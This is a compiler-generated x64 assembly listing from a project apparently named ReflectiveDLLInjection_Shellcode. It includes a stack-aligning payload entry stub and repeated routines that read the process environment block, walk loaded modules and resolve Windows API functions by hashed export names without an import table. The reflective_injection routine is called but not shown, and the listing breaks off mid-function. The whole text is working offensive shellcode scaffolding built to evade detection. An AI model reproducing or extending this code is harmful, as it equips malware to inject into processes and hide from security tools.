; Listing generated by Microsoft (R) Optimizing Compiler Version 19.30.30709.0 

include listing.inc

PUBLIC	?hash_str@importless_api@@YAIPEBDI@Z		; importless_api::hash_str
PUBLIC	?caller@@YA_KXZ					; caller
PUBLIC	?reflective_injection@@YAHXZ			; reflective_injection
PUBLIC	?peb@?$importless_api@$0GKNMHPHA@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<1792835440>::peb
PUBLIC	??0?$importless_api@$0GKNMHPHA@@importless_api@@QEAA@XZ ; importless_api::importless_api<1792835440>::importless_api<1792835440>
PUBLIC	?get_function@?$importless_api@$0GKNMHPHA@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<1792835440>::get_function
PUBLIC	?peb@?$importless_api@$0FEPMOHEI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<1425860424>::peb
PUBLIC	??0?$importless_api@$0FEPMOHEI@@importless_api@@QEAA@XZ ; importless_api::importless_api<1425860424>::importless_api<1425860424>
PUBLIC	?get_function@?$importless_api@$0FEPMOHEI@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<1425860424>::get_function
PUBLIC	?peb@?$importless_api@$0CBOPAGBI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<569312792>::peb
PUBLIC	??0?$importless_api@$0CBOPAGBI@@importless_api@@QEAA@XZ ; importless_api::importless_api<569312792>::importless_api<569312792>
PUBLIC	?get_function@?$importless_api@$0CBOPAGBI@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<569312792>::get_function
PUBLIC	?peb@?$importless_api@$0LEDCLCND@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<3023221459>::peb
PUBLIC	??0?$importless_api@$0LEDCLCND@@importless_api@@QEAA@XZ ; importless_api::importless_api<3023221459>::importless_api<3023221459>
PUBLIC	?get_function@?$importless_api@$0LEDCLCND@@importless_api@@QEAAPEAXXZ ; importless_api::importless_api<3023221459>::get_function
PUBLIC	main
PUBLIC	??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ ; importless_api::importless_api<505452226>::importless_api<505452226>
PUBLIC	?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ ; importless_api::importless_api<505452226>::get_hash
;	COMDAT pdata

; Function compile flags: /Odtp
;	COMDAT ?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ
_TEXT	SEGMENT

AlignRSP PROC
    push rsi ; Preserve RSI since we're stomping on it
    mov rsi, rsp ; Save the value of RSP so it can be restored
    and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
    sub rsp, 020h ; Allocate homing space for ExecutePayload
    call main ; Call the entry point of the payload
    mov rsp, rsi ; Restore the original value of RSP
    pop rsi ; Restore RSI
    ret ; Return to caller
AlignRSP ENDP

this$ = 8
?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ PROC ; importless_api::importless_api<505452226>::get_hash, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 241
	mov	QWORD PTR [rsp+8], rcx
; Line 242
	mov	eax, 505452226				; 1e2096c2H
; Line 243
	ret	0
?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ ENDP ; importless_api::importless_api<505452226>::get_hash
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ
_TEXT	SEGMENT
this$ = 8
??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ PROC ; importless_api::importless_api<505452226>::importless_api<505452226>, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	mov	QWORD PTR [rsp+8], rcx
; Line 237
	mov	rax, QWORD PTR this$[rsp]
	mov	DWORD PTR [rax], 505452226		; 1e2096c2H
; Line 238
	mov	rax, QWORD PTR this$[rsp]
	ret	0
??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ ENDP ; importless_api::importless_api<505452226>::importless_api<505452226>
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
main	PROC
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\main.cpp
; Line 294
$LN3:
	sub	rsp, 40					; 00000028H
; Line 295
	call	?reflective_injection@@YAHXZ		; reflective_injection
; Line 296
	xor	eax, eax
	add	rsp, 40					; 00000028H
	ret	0
main	ENDP
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0LEDCLCND@@importless_api@@QEAAPEAXXZ
_TEXT	SEGMENT
hBase$1 = 32
hImageExportDirectory$2 = 40
curr_module$ = 48
func_hash$3 = 56
dwFuncRVA$4 = 60
i$5 = 64
pNamePointers$6 = 72
pOrdinalPointers$7 = 80
hImageNtHeaders$8 = 88
$T9 = 96
hImageDosHeader$10 = 104
pAddressesPointers$11 = 112
this$ = 144
?get_function@?$importless_api@$0LEDCLCND@@importless_api@@QEAAPEAXXZ PROC ; importless_api::importless_api<3023221459>::get_function, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
$LN10:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 136				; 00000088H
; Line 248
	mov	rcx, QWORD PTR this$[rsp]
	call	?peb@?$importless_api@$0LEDCLCND@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<3023221459>::peb
	mov	rax, QWORD PTR [rax+24]
	mov	rax, QWORD PTR [rax+16]
	mov	QWORD PTR curr_module$[rsp], rax
$LN2@get_functi:
; Line 251
	mov	rax, QWORD PTR curr_module$[rsp]
	cmp	QWORD PTR [rax+96], 0
	je	$LN3@get_functi
; Line 252
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax+48]
	mov	QWORD PTR hBase$1[rsp], rax
; Line 255
	mov	rax, QWORD PTR hBase$1[rsp]
	mov	QWORD PTR hImageDosHeader$10[rsp], rax
; Line 256
	mov	rax, QWORD PTR hImageDosHeader$10[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageNtHeaders$8[rsp], rax
; Line 259
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	cmp	DWORD PTR [rcx+rax+136], 0
	je	$LN7@get_functi
; Line 261
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	mov	eax, DWORD PTR [rcx+rax+136]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageExportDirectory$2[rsp], rax
; Line 263
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+32]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pNamePointers$6[rsp], rax
; Line 264
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+36]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
; Line 265
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressesPointers$11[rsp], rax
; Line 268
	mov	QWORD PTR i$5[rsp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	rax, QWORD PTR i$5[rsp]
	inc	rax
	mov	QWORD PTR i$5[rsp], rax
	mov	rax, QWORD PTR pNamePointers$6[rsp]
	add	rax, 4
	mov	QWORD PTR pNamePointers$6[rsp], rax
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	add	rax, 2
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
$LN6@get_functi:
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+24]
	cmp	QWORD PTR i$5[rsp], rax
	jae	SHORT $LN5@get_functi
; Line 270
	lea	rcx, QWORD PTR $T9[rsp]
	call	??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ ; importless_api::importless_api<505452226>::importless_api<505452226>
	mov	rcx, rax
	call	?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ ; importless_api::importless_api<505452226>::get_hash
	mov	rcx, QWORD PTR pNamePointers$6[rsp]
	mov	ecx, DWORD PTR [rcx]
	mov	rdx, QWORD PTR hBase$1[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	mov	edx, eax
	call	?hash_str@importless_api@@YAIPEBDI@Z	; importless_api::hash_str
	mov	DWORD PTR func_hash$3[rsp], eax
; Line 271
	cmp	DWORD PTR func_hash$3[rsp], -1271745837	; b432b2d3H
	jne	SHORT $LN8@get_functi
; Line 273
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	movzx	eax, WORD PTR [rax]
	mov	rcx, QWORD PTR pAddressesPointers$11[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR dwFuncRVA$4[rsp], eax
; Line 276
	mov	eax, DWORD PTR dwFuncRVA$4[rsp]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	$LN4@get_functi
$LN5@get_functi:
$LN7@get_functi:
; Line 281
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR curr_module$[rsp], rax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	add	rsp, 136				; 00000088H
	ret	0
?get_function@?$importless_api@$0LEDCLCND@@importless_api@@QEAAPEAXXZ ENDP ; importless_api::importless_api<3023221459>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0LEDCLCND@@importless_api@@QEAA@XZ
_TEXT	SEGMENT
this$ = 8
??0?$importless_api@$0LEDCLCND@@importless_api@@QEAA@XZ PROC ; importless_api::importless_api<3023221459>::importless_api<3023221459>, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	mov	QWORD PTR [rsp+8], rcx
; Line 237
	mov	rax, QWORD PTR this$[rsp]
	mov	DWORD PTR [rax], -1271745837		; b432b2d3H
; Line 238
	mov	rax, QWORD PTR this$[rsp]
	ret	0
??0?$importless_api@$0LEDCLCND@@importless_api@@QEAA@XZ ENDP ; importless_api::importless_api<3023221459>::importless_api<3023221459>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0LEDCLCND@@importless_api@@AEAAPEBUPEB_T@win@2@XZ
_TEXT	SEGMENT
this$ = 8
?peb@?$importless_api@$0LEDCLCND@@importless_api@@AEAAPEBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<3023221459>::peb, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	mov	QWORD PTR [rsp+8], rcx
; Line 215
	mov	rax, QWORD PTR gs:[96]
; Line 227
	ret	0
?peb@?$importless_api@$0LEDCLCND@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<3023221459>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0CBOPAGBI@@importless_api@@QEAAPEAXXZ
_TEXT	SEGMENT
hBase$1 = 32
hImageExportDirectory$2 = 40
curr_module$ = 48
func_hash$3 = 56
dwFuncRVA$4 = 60
i$5 = 64
pNamePointers$6 = 72
pOrdinalPointers$7 = 80
hImageNtHeaders$8 = 88
$T9 = 96
hImageDosHeader$10 = 104
pAddressesPointers$11 = 112
this$ = 144
?get_function@?$importless_api@$0CBOPAGBI@@importless_api@@QEAAPEAXXZ PROC ; importless_api::importless_api<569312792>::get_function, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
$LN10:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 136				; 00000088H
; Line 248
	mov	rcx, QWORD PTR this$[rsp]
	call	?peb@?$importless_api@$0CBOPAGBI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<569312792>::peb
	mov	rax, QWORD PTR [rax+24]
	mov	rax, QWORD PTR [rax+16]
	mov	QWORD PTR curr_module$[rsp], rax
$LN2@get_functi:
; Line 251
	mov	rax, QWORD PTR curr_module$[rsp]
	cmp	QWORD PTR [rax+96], 0
	je	$LN3@get_functi
; Line 252
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax+48]
	mov	QWORD PTR hBase$1[rsp], rax
; Line 255
	mov	rax, QWORD PTR hBase$1[rsp]
	mov	QWORD PTR hImageDosHeader$10[rsp], rax
; Line 256
	mov	rax, QWORD PTR hImageDosHeader$10[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageNtHeaders$8[rsp], rax
; Line 259
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	cmp	DWORD PTR [rcx+rax+136], 0
	je	$LN7@get_functi
; Line 261
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	mov	eax, DWORD PTR [rcx+rax+136]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageExportDirectory$2[rsp], rax
; Line 263
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+32]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pNamePointers$6[rsp], rax
; Line 264
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+36]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
; Line 265
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressesPointers$11[rsp], rax
; Line 268
	mov	QWORD PTR i$5[rsp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	rax, QWORD PTR i$5[rsp]
	inc	rax
	mov	QWORD PTR i$5[rsp], rax
	mov	rax, QWORD PTR pNamePointers$6[rsp]
	add	rax, 4
	mov	QWORD PTR pNamePointers$6[rsp], rax
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	add	rax, 2
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
$LN6@get_functi:
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+24]
	cmp	QWORD PTR i$5[rsp], rax
	jae	SHORT $LN5@get_functi
; Line 270
	lea	rcx, QWORD PTR $T9[rsp]
	call	??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ ; importless_api::importless_api<505452226>::importless_api<505452226>
	mov	rcx, rax
	call	?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ ; importless_api::importless_api<505452226>::get_hash
	mov	rcx, QWORD PTR pNamePointers$6[rsp]
	mov	ecx, DWORD PTR [rcx]
	mov	rdx, QWORD PTR hBase$1[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	mov	edx, eax
	call	?hash_str@importless_api@@YAIPEBDI@Z	; importless_api::hash_str
	mov	DWORD PTR func_hash$3[rsp], eax
; Line 271
	cmp	DWORD PTR func_hash$3[rsp], 569312792	; 21ef0618H
	jne	SHORT $LN8@get_functi
; Line 273
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	movzx	eax, WORD PTR [rax]
	mov	rcx, QWORD PTR pAddressesPointers$11[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR dwFuncRVA$4[rsp], eax
; Line 276
	mov	eax, DWORD PTR dwFuncRVA$4[rsp]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	$LN4@get_functi
$LN5@get_functi:
$LN7@get_functi:
; Line 281
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR curr_module$[rsp], rax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	add	rsp, 136				; 00000088H
	ret	0
?get_function@?$importless_api@$0CBOPAGBI@@importless_api@@QEAAPEAXXZ ENDP ; importless_api::importless_api<569312792>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0CBOPAGBI@@importless_api@@QEAA@XZ
_TEXT	SEGMENT
this$ = 8
??0?$importless_api@$0CBOPAGBI@@importless_api@@QEAA@XZ PROC ; importless_api::importless_api<569312792>::importless_api<569312792>, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	mov	QWORD PTR [rsp+8], rcx
; Line 237
	mov	rax, QWORD PTR this$[rsp]
	mov	DWORD PTR [rax], 569312792		; 21ef0618H
; Line 238
	mov	rax, QWORD PTR this$[rsp]
	ret	0
??0?$importless_api@$0CBOPAGBI@@importless_api@@QEAA@XZ ENDP ; importless_api::importless_api<569312792>::importless_api<569312792>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0CBOPAGBI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ
_TEXT	SEGMENT
this$ = 8
?peb@?$importless_api@$0CBOPAGBI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<569312792>::peb, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	mov	QWORD PTR [rsp+8], rcx
; Line 215
	mov	rax, QWORD PTR gs:[96]
; Line 227
	ret	0
?peb@?$importless_api@$0CBOPAGBI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<569312792>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0FEPMOHEI@@importless_api@@QEAAPEAXXZ
_TEXT	SEGMENT
hBase$1 = 32
hImageExportDirectory$2 = 40
curr_module$ = 48
func_hash$3 = 56
dwFuncRVA$4 = 60
i$5 = 64
pNamePointers$6 = 72
pOrdinalPointers$7 = 80
hImageNtHeaders$8 = 88
$T9 = 96
hImageDosHeader$10 = 104
pAddressesPointers$11 = 112
this$ = 144
?get_function@?$importless_api@$0FEPMOHEI@@importless_api@@QEAAPEAXXZ PROC ; importless_api::importless_api<1425860424>::get_function, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
$LN10:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 136				; 00000088H
; Line 248
	mov	rcx, QWORD PTR this$[rsp]
	call	?peb@?$importless_api@$0FEPMOHEI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<1425860424>::peb
	mov	rax, QWORD PTR [rax+24]
	mov	rax, QWORD PTR [rax+16]
	mov	QWORD PTR curr_module$[rsp], rax
$LN2@get_functi:
; Line 251
	mov	rax, QWORD PTR curr_module$[rsp]
	cmp	QWORD PTR [rax+96], 0
	je	$LN3@get_functi
; Line 252
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax+48]
	mov	QWORD PTR hBase$1[rsp], rax
; Line 255
	mov	rax, QWORD PTR hBase$1[rsp]
	mov	QWORD PTR hImageDosHeader$10[rsp], rax
; Line 256
	mov	rax, QWORD PTR hImageDosHeader$10[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageNtHeaders$8[rsp], rax
; Line 259
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	cmp	DWORD PTR [rcx+rax+136], 0
	je	$LN7@get_functi
; Line 261
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	mov	eax, DWORD PTR [rcx+rax+136]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageExportDirectory$2[rsp], rax
; Line 263
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+32]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pNamePointers$6[rsp], rax
; Line 264
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+36]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
; Line 265
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pAddressesPointers$11[rsp], rax
; Line 268
	mov	QWORD PTR i$5[rsp], 0
	jmp	SHORT $LN6@get_functi
$LN4@get_functi:
	mov	rax, QWORD PTR i$5[rsp]
	inc	rax
	mov	QWORD PTR i$5[rsp], rax
	mov	rax, QWORD PTR pNamePointers$6[rsp]
	add	rax, 4
	mov	QWORD PTR pNamePointers$6[rsp], rax
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	add	rax, 2
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
$LN6@get_functi:
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+24]
	cmp	QWORD PTR i$5[rsp], rax
	jae	SHORT $LN5@get_functi
; Line 270
	lea	rcx, QWORD PTR $T9[rsp]
	call	??0?$importless_api@$0BOCAJGMC@@importless_api@@QEAA@XZ ; importless_api::importless_api<505452226>::importless_api<505452226>
	mov	rcx, rax
	call	?get_hash@?$importless_api@$0BOCAJGMC@@importless_api@@QEAAIXZ ; importless_api::importless_api<505452226>::get_hash
	mov	rcx, QWORD PTR pNamePointers$6[rsp]
	mov	ecx, DWORD PTR [rcx]
	mov	rdx, QWORD PTR hBase$1[rsp]
	add	rdx, rcx
	mov	rcx, rdx
	mov	edx, eax
	call	?hash_str@importless_api@@YAIPEBDI@Z	; importless_api::hash_str
	mov	DWORD PTR func_hash$3[rsp], eax
; Line 271
	cmp	DWORD PTR func_hash$3[rsp], 1425860424	; 54fce748H
	jne	SHORT $LN8@get_functi
; Line 273
	mov	rax, QWORD PTR pOrdinalPointers$7[rsp]
	movzx	eax, WORD PTR [rax]
	mov	rcx, QWORD PTR pAddressesPointers$11[rsp]
	mov	eax, DWORD PTR [rcx+rax*4]
	mov	DWORD PTR dwFuncRVA$4[rsp], eax
; Line 276
	mov	eax, DWORD PTR dwFuncRVA$4[rsp]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	jmp	SHORT $LN1@get_functi
$LN8@get_functi:
; Line 278
	jmp	$LN4@get_functi
$LN5@get_functi:
$LN7@get_functi:
; Line 281
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR curr_module$[rsp], rax
; Line 282
	jmp	$LN2@get_functi
$LN3@get_functi:
; Line 284
	xor	eax, eax
$LN1@get_functi:
; Line 285
	add	rsp, 136				; 00000088H
	ret	0
?get_function@?$importless_api@$0FEPMOHEI@@importless_api@@QEAAPEAXXZ ENDP ; importless_api::importless_api<1425860424>::get_function
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ??0?$importless_api@$0FEPMOHEI@@importless_api@@QEAA@XZ
_TEXT	SEGMENT
this$ = 8
??0?$importless_api@$0FEPMOHEI@@importless_api@@QEAA@XZ PROC ; importless_api::importless_api<1425860424>::importless_api<1425860424>, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 235
	mov	QWORD PTR [rsp+8], rcx
; Line 237
	mov	rax, QWORD PTR this$[rsp]
	mov	DWORD PTR [rax], 1425860424		; 54fce748H
; Line 238
	mov	rax, QWORD PTR this$[rsp]
	ret	0
??0?$importless_api@$0FEPMOHEI@@importless_api@@QEAA@XZ ENDP ; importless_api::importless_api<1425860424>::importless_api<1425860424>
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?peb@?$importless_api@$0FEPMOHEI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ
_TEXT	SEGMENT
this$ = 8
?peb@?$importless_api@$0FEPMOHEI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ PROC ; importless_api::importless_api<1425860424>::peb, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 213
	mov	QWORD PTR [rsp+8], rcx
; Line 215
	mov	rax, QWORD PTR gs:[96]
; Line 227
	ret	0
?peb@?$importless_api@$0FEPMOHEI@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ENDP ; importless_api::importless_api<1425860424>::peb
_TEXT	ENDS
; Function compile flags: /Odtp
;	COMDAT ?get_function@?$importless_api@$0GKNMHPHA@@importless_api@@QEAAPEAXXZ
_TEXT	SEGMENT
hBase$1 = 32
hImageExportDirectory$2 = 40
curr_module$ = 48
func_hash$3 = 56
dwFuncRVA$4 = 60
i$5 = 64
pNamePointers$6 = 72
pOrdinalPointers$7 = 80
hImageNtHeaders$8 = 88
$T9 = 96
hImageDosHeader$10 = 104
pAddressesPointers$11 = 112
this$ = 144
?get_function@?$importless_api@$0GKNMHPHA@@importless_api@@QEAAPEAXXZ PROC ; importless_api::importless_api<1792835440>::get_function, COMDAT
; File C:\Users\Yoav\Desktop\YoavTools\RealPE\RealPE\ReflectiveDLLInjection_Shellcode\ImportlessApi.hpp
; Line 247
$LN10:
	mov	QWORD PTR [rsp+8], rcx
	sub	rsp, 136				; 00000088H
; Line 248
	mov	rcx, QWORD PTR this$[rsp]
	call	?peb@?$importless_api@$0GKNMHPHA@@importless_api@@AEAAPEBUPEB_T@win@2@XZ ; importless_api::importless_api<1792835440>::peb
	mov	rax, QWORD PTR [rax+24]
	mov	rax, QWORD PTR [rax+16]
	mov	QWORD PTR curr_module$[rsp], rax
$LN2@get_functi:
; Line 251
	mov	rax, QWORD PTR curr_module$[rsp]
	cmp	QWORD PTR [rax+96], 0
	je	$LN3@get_functi
; Line 252
	mov	rax, QWORD PTR curr_module$[rsp]
	mov	rax, QWORD PTR [rax+48]
	mov	QWORD PTR hBase$1[rsp], rax
; Line 255
	mov	rax, QWORD PTR hBase$1[rsp]
	mov	QWORD PTR hImageDosHeader$10[rsp], rax
; Line 256
	mov	rax, QWORD PTR hImageDosHeader$10[rsp]
	movsxd	rax, DWORD PTR [rax+60]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageNtHeaders$8[rsp], rax
; Line 259
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	cmp	DWORD PTR [rcx+rax+136], 0
	je	$LN7@get_functi
; Line 261
	mov	eax, 8
	imul	rax, rax, 0
	mov	rcx, QWORD PTR hImageNtHeaders$8[rsp]
	mov	eax, DWORD PTR [rcx+rax+136]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR hImageExportDirectory$2[rsp], rax
; Line 263
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+32]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pNamePointers$6[rsp], rax
; Line 264
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+36]
	mov	rcx, QWORD PTR hBase$1[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR pOrdinalPointers$7[rsp], rax
; Line 265
	mov	rax, QWORD PTR hImageExportDirectory$2[rsp]
	mov	eax, DWORD PTR [rax+28]
	mov	rcx, QWORD PTR hBase$1[rsp]
